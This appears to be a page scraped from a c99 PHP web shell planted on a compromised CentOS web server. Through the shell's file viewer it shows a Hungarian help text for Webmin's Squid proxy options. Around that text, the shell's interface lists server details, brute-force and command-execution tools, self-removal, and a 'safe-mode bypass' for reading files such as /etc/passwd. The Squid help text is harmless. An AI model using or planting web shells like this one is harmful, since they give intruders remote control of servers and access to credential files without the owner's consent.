!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/squid/help/   drwxr-xr-x
Free 53.68 GB of 127.8 GB (42%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     edit_misc.hu.html (5.44 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Egyéb opciók; fordította: Szakács Gergely

Indulási DNS tesztcímek: Azok a DNS kiszolgálók, amelyeknek a Squid induláskor kéréseket küld, hogy megvizsgálja, működnek-e a DNS-keresések.

SIGUSR1 naplófájl-rotáció: A rendszertől függően az alapértelmezés 10 vagy 0. Meghatározza a naplófájl rotációinak számát a 'squid -k rotate' parancs után. Az alapértelmezés 10, amely a 0-9-ig terjedő kiterjesztéseket fogja rotálni. A logfile_rotate 0-ra állításával kikapcsolhatja a rotációt, ám a naplófájlokat ettől függetlenül szabadon nyithatja és zárhatja a rendszer. Így saját maga nevezheti át a naplófájlokat a rotációs jel elküldése előtt.

A 'squid -k rotate' parancs normális esetben egy USR1 jelet küld a futó Squid folyamatnak. Egyes esetekben (pl. Aszinkron I/O-s Linuxon), az USR1-et más célokra alkalmazzák, így a -k rotáció is már jelet használ. Ezért célravezetőbb a 'squid -k rotate' használata a 'kill -USR1 ' helyett.

Hibaüzenetek szövege: A hibaüzenetekben kiírandó HTML-szöveg. Ez lehet egy "mailto" URL a rendszergazda címére, vagy egy, a cég honlapjára mutató link.

Ahhoz, hogy a fenti információk megjelenjenek a hibaüzenetekben, át kell írnia (a "hibák" könyvtárban található) sablonfájlokat. Ahol szeretné megjeleníteni a 'err_html_text' sort, szúrjon be egy %L előtagot a hibaüzenet sablonfájljába.

Kliensenkénti statisztikák: Ha le akarja tiltani a kliensenkénti statisztikát, kapcsolja ki a client_db opciót.

X-Továbbítva-Ide fejléc: Alapértelmezés szerint bekapcsolva. Ha ez az opció be van kapcsolva, akkor a Squid belefoglalja a rendszer IP-címét vagy nevét a továbbított HTTP-kérésekbe. Alapértelmezés szerint ez így néz ki:

X-Továbbítva-Ide: 192.1.2.3

Ha kikapcsolja ezt a funkciót, akkor a következőt kapja:

X-Továbbítva-Ide: ismeretlen

ICP-kérések naplózása: Alapértelmezés szerint bekapcsolva. Ha ez az opció be van kapcsolva, úgy az ICP-kérések az access.log naplófájlban tárolódnak. Abban az esetben, ha az ICP-terhelés NAGYON magas, vagy ha a naplókezelés túl bonyolult, kikapcsolhatja ezt az opciót.

Minimális közvetlen ugrás: Alapértelmezés szerint 4. Ha ICMP pingelőt használ, irányítsa a lekérdezéseket olyan oldalakra, amelyek nincsenek távolabb az itt meghatározott ugrásoknál.

Memória megőrzése a későbbiekre: Alapértelmezés szerint bekapcsolva. Ha ez az opció be van kapcsolva, úgy a Squid megőriz hozzárendelt (de nem használt) memóriaterületeket későbbi felhasználásra. Ha a memória kulcsfontosságú a rendszeren, és úgy véli, hogy a memória-hozzárendelési könyvtár túlteljesíti a Squid rutinokat, kapcsolja ki ezt a funkciót.

Megőrzendő memória nagysága: Alapértelmezés szerint korlátlan. Ha ezt az opciót bármely, nullától eltérő értékre állítja, a Squid legfeljebb a megadott értékű hozzárendelt (de nem használt) memóriát fogja megőrizni. Minden free() kérés, ami meghaladja ezt a szintet, a memória-hozzárendelési könyvtár hatáskörébe kerül. A Squid előzetesen nem különít el semennyi memóriát, csak biztonságban tartja azon objektumokat, amelyeket amúgy felszabadítana. Így érdemes a memory_pools_limit szintjét meglehetősen magasra venni, még akkor is, ha a konfigurációja egyébként kevesebb memóriát használ.

Ha ez az opció nincs beállítva (alapértelmezés) vagy értéke nulla, úgy a Squid az összes elérhető memóriát meg fogja őrizni. Másképp szólva, a biztonsági megőrzésre használható memória felső határa nem lesz korlátozva.

Átengedhető fejlécek: Alapértelmezés szerint minden fejléc. Ez a jól konfigurálható opció a korábbi 'http_anonymizer' opciót váltja fel. Mostantól meghatározhatja, hogy pontosan mely fejlécek engedélyezhetők, és melyek eltávolítandók a kimenő kérésekből.

Ez az opció kétféleképp használható. Vagy engedélyez egyes fejléceket (ezzel kizárva másokat), vagy letiltja őket (ezzel engedélyezve minden mást).

Hamis felhasználói ágens: Alapértelmezés szerint nincs. Ha a felhasználói ágens fejlécet az átengedhető fejlécek opcióval szűri, úgy előfordulhat, hogy egyes webkiszolgálók elutasítják a kérést. Használja ezt egy hamis ágens létrehozatalához.

HTTP Accel Host: Alapértelmezés szerint nincs. Ha a Squid-et httpd-gyorsítóként akarja használni, úgy ezt a címet állítsa át a valódi HTTP-kiszolgáló címére.

HTTP Accel Port: Alapértelmezés szerint nincs. Az HTTP Accel Host beállításán felül itt meg kell adnia a valódi kiszolgáló portját is, ha gyorsítóként használja a Squid-et.

HTTP Accel With Proxy: Alapértelmezés szerint kikapcsolva. Engedélyezze ezt az opciót, ha azt szeretné, hogy a Squid hagyományos proxy-ként üzemeljen, miközben HTTP-gyorsítóként is működik. Ezt az opciót transzparens proxy-k esetében is be kell kapcsolni.

HTTP Accel Uses Host Header: Alapértelmezés szerint kikapcsolva. A HTTP/1.1 kérések tartalmaznak gazdát: egy fejlécet, amely lényegében az URL-ből vett gazdanév. A Squid lehet több HTTP-kiszolgáló gyorsítója is, e fejléc használatával. Mindazonáltal a Squid NEM ellenőrzi a gazdafejléc tartalmát, így ez egy nagy biztonsági lyukat nyit a rendszeren. Azt javasoljuk, hogy ezt az opciót hagyja kikapcsolva, hacsak nem teljesen biztos a dolgában.

Engedélyeznie kell azonban ezt az opciót abban az esetben, ha a Squid-et transzparens proxy-ként használja. Máskülönben a virtuális kiszolgálók részéről a gazda fejléce nem lesz megfelelően gyorstárazva.



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0086 ]--